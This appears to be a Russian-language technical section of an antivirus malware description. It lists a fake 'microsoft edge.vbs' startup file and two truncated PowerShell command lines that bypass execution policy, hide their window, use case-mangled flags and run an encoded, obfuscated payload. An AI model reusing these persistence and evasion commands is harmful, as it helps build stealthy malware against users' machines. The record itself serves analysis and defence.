Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\ microsoft edge.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoExiT -WiNdOwStYlE HiDdeN -eNc WwA8ACMAMAAwADAAIwA+AEEAcABwAEQAbwBtAGEAaQBuADwAIwAwADAAMAAjAD4AXQA6ADoAKAAnAFgAeABYAHUAcgByAGUAbgB0ACYATgBvAG0AYQBpAG4AJwAuAHIAZQBwAGwA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoExiT -WiNdOwStYlE HiDdeN -eNc WwA8ACMAMAAwADAAIwA+AEEAcABwAEQAbwBtAGEAaQBuADwAIwAwADAAMAAjAD4AXQA6ADoAKAAnAFgAeABYAHUAcgByAGUAbgB0ACYATgBvAG0AYQBpAG4AJwAuAHIAZQBwAGwA...